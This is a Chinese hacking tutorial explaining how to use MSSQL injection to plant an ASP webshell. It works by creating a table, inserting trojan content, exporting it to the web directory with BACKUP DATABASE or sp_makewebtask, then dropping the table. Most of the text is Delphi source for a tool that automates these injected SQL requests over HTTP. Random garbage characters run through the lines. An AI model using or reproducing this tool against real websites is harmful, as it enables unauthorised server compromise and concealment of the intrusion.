SQL注入得到WEBSHELL

韩冰

<>一．通过SQL注入得到WEBSHELL的原理:
N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。
! c( V) G5 W) V) \5 u5 J5 g分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来，设想数据库中有&lt;%%&gt;之类的ASP标实符，导出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释&lt;%%&gt; 之内的语句呢？如果数据库中有的表中有&lt;%%&gt;标实符，并且这之中有错误，那么我们导出来生成的ASP文件也会有误。不过，这种机会也不太大。
; a3 q% S8 ^2 V再来看看CZY的方法吧。
CZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是：可以把MSSQL数据库中的某个表中的记录导出来，以文件的方法保存起来。这种方法就不会出现什么问题原因在于：我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候，先调试一下，没有问题在加入进去，导出来就当然没有问题了。
- B5 f- v( A1 b* @. Q( h以上两位的方法，我都手工测试过。利用SQL注入漏洞，建表，向表中加数据，然后再导出数据，再删除表。都是利用的SQL语句。这里我就不多说了，大家可以看本期的文章。
, _, @) }' x6 s, b& G3 v+ E, V二．利用DELPHI去实现功能的前言
原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢？其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序，有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做？因为得到这两者用SQL注入是非常难得到的。所以，我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。

7 Y3 m( k9 i/ [三．如何利用DELPHI得到WEBSHELL。
( h+ t, n& s  \4 M3 w2 M程序中用到的值。我们这里来看看有哪些：URL路径，远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法，你选哪一种)。我们同时要求点击一个按纽开始执行命令，和点击一个按纽来终止命今。最后就是新建的表的名称，以及表的字段名称，再次就是字段的类型。前面的我们在程序中放上输入，选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
& {7 r* b: K" L$ X6 c. m首先，我们在DIT控件。名称分别是：UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为： BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是：设置，开始，停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图：
0 i) w6 U. s8 h+ ^5 |( F- ~  V4 a! o


& V' t3 c  }! T, a现在来写程序了。
% u! }, e) T! v. ^+ Q, }% P- m我们首先定义一个RECORD。
: j* {# n, j0 y( e7 e如下：
6 x: s- g" }+ p, m6 T/ B" SType
/ u' e5 m7 X1 sSetOption = Record
. W% f: N7 d/ c+ X' K9 ^TableName : String; //用来保存要创建的表名.
! o. r* E) Q6 R8 m: B, O: h/ P# FFieldName : String; //用来保存要创建的字段名.
( _7 ^  `5 V5 N' y& v; T+ x& zFiledType : String; //用来保存创建的字段名类型.
End;
FiledType字段类型的值是以下类型的一种：
+ _2 e4 D/ n$ cBigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
Smallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
再定义一个全局变量：
Var
# M. Q+ |& |, i1 \ISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中，我们为RECORD记录输入默认值.
% V) R8 C: i/ x: S) L; I# r代码如下：
procedure TMainForm.FormCreate(Sender: TObject);
begin
sOption.TableName :='cyfd'
$ W& e* J) u9 l9 _/ S7 YsOption.FieldName :='gmemo'
4 _, U  G) O- a- T; p- R8 [. |sOption.FiledType :='text'
end;
" Y/ u' h' |' O; W+ w: K% ?现在我们添加开始执行命令的代码。
4 A# N9 u( u+ ^* s& r4 c- @2 i先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
* Q: g( g! ?/ {" d+ b3 x在程序开始执行前,我们得先检查一下用户的输入
( T' U, f, i% ^* C定义一个Checkinput函数.
8 x% H$ @# w- Z* w# V' a; W' ~如下：
Function CheckInput : Boolean;
( T" m$ u7 W' n# k) E7 C" kBegin
Result := False;
if Trim(urlet.Text) = '' then
Begin
Application.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
Exit;
End;
if Trim(ShellPathET.Text) = '' then
Begin
Application.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
Exit;
/ K( b# ~2 |& @End;
1 C9 c2 ^" r5 M" {# PIF DefBDoor.Checked then
$ H2 N6 R2 ]1 n6 g( S8 ~8 o; B2 cBegin
if Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
Begin
2 t2 l4 ]& B9 G7 }# ~( D) r9 ~Application.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
  z" p7 v0 Y2 u9 fEnd
+ \+ T; a5 R; RElse
if Not FileExists(CustomBdoorET.Text) then
/ w" a; }! b: h. f# j) YBegin
! B; U4 R' L) L' zApplication.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
; n% O+ t7 O0 n1 T2 z3 ^2 M! H/ z& PExit;
End;
+ `. t6 [/ q# |& n, _2 EResult := True;
End;
在最开始加入:
$ K# r" u6 I" L4 DIF Not CheckInput then Exit; //如果输入不合法就退出过程.
9 K) h, T2 C  s% m7 a9 L5 o6 }好了，如果用户输入没什么错，我们就来下面的代码。
& J0 b! j# @* t' `首先我们把IsStop设为假。创建BdoorList。
" }1 S% @, k) _. qBDoorList := TstringList.Create;
再加木马内容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
好了,在这里我还要给大家说一下：用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25，不然.程序加不进数据。
代码如下：
BDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
0 b5 n7 @* y5 Y" y# b" ?BDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
* @. h9 b7 Z: l8 X接下来.我们就提交建表的功能了.
Memo.Lines.Add('建表...');
Memo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
+ p0 x; p9 z3 P8 j9 n6 t' q# p7 u* `这样我们就创建了一个表。然后.我们向表中加记录:
+ J# ]& {+ w: H代码如下:
# c; P$ p; Z! LMemo.Lines.Add('加数据...');
* Q: V6 Y( c5 W" I, ~! W/ wMemo.Lines.Add('');
! L1 v& m5 A6 B: Z. k" I" xFor i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
; Q, U# e9 g1 l3 ]3 h# h" q% }/ z) ~Begin
$ U4 \: S6 C; b7 U: g5 g4 _IF IsStop then //这里如果点了停止按纽程序将终止任务.
) p. e5 |# c4 e( F* B. e2 EBegin
BDoorList.Free;
2 g8 a# @" _+ N* N! ]Exit;
End; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
Memo.Lines.Add('Add Line '+Inttostr(i+1));
3 ~* M8 H$ O' }6 B- i, DEnd;
现在就是导出数据生成木马了.
. ^; r) p: Q9 J) g! TMemo.Lines.Add('导出数据...');
Memo.Lines.Add('');
$ j! X' E" Y; h% Z, BIF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
NMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
7 y6 {+ [4 Y  E  Q. Y' KElse //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
% f1 ?& t8 v. k5 z这样我们的任务就完成了。下面来释放变量.
BDoorList.Free;
7 O/ o+ M" Y( `再来向停止按纽中添加点击事件：
一行代码就行了：IsStop := True;
$ C8 J* j, R& e9 S* o# s! t- X& g# y到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值，再次赋给RECORD就行了。
& U* C( H/ }1 C设置表单中先引用主表单.然后在界面中添加二个EDIT控件：
. s, e5 q; N/ ?) S2 d; `第一个名称为：TableNameET //保用户输入的存临时表
第二个名称为：FieldNameET //用来保存用户输入的字段名.
再添加一个Combobox　//用来保存用户所选的字段类型值.
名称：FieldTypeCombox
OK.界面如下：
. w7 y1 }) w3 J* |
- V) c* E, l( Y" h代码如下:
定义一个过程,主表单好调用这个设置。
6 S5 U  C0 [  l4 E% OProcedure ShowSet;
Begin
Application.CreateForm(TSetForm,SetForm);
$ x- N; O0 `4 G$ g1 qWith SetForm do
Begin
TableNameET.Text := sOption.TableName;
  h# E7 C1 D. h( A$ ~# _FieldNameET.Text := sOption.FieldName;
# t1 t; Q* W8 M3 bFieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
End;
4 `) V& Q# X% l$ R8 @SetForm.ShowModal;
/ H, o1 C' O6 a; d7 d$ f9 dSetForm.Free;
End;
7 p- `' @* _% L4 {7 r; f' n0 U在主表单中设置的点击事件中添加上showset过程就行了。
  R, F. T0 `9 b, p8 L下面就是点击确定的代码了。
8 _' N  q1 f" KIF CheckInput then
6 t( B2 f: ^1 R3 ^Begin
sOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
/ b, E- L" N9 W0 [) BsOption.FieldName := Trim(FieldNameET.Text);
sOption.FiledType := FieldTypeCombox.Text;
  s: x6 v1 h+ F0 ?5 T4 RClose;
End;
这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
代码如下:
  a, ]1 _) {. v$ u8 j6 k7 y" n) yFunction CheckInput : Boolean;
! v% K! C1 {& @& P7 lBegin
Result := False;
5 W0 w+ t! l8 HIF Trim(TableNameET.Text)='' then
Begin
0 v2 s# ^: v* I  zApplication.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
/ q& N: j0 `* [Exit;
1 Y  P2 P1 a# v/ J6 p3 c# A5 aEnd;
IF Trim(FieldNameET.Text)='' then
Begin
0 H# H/ {: b8 Z& X7 @6 W8 r! }4 IApplication.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
; ~: V  x- {* \  K! X1 F: {( ?Exit;
End;
! G6 w- E7 k  G8 |! ZResult := True;
End;
到这里程序就完了。</P>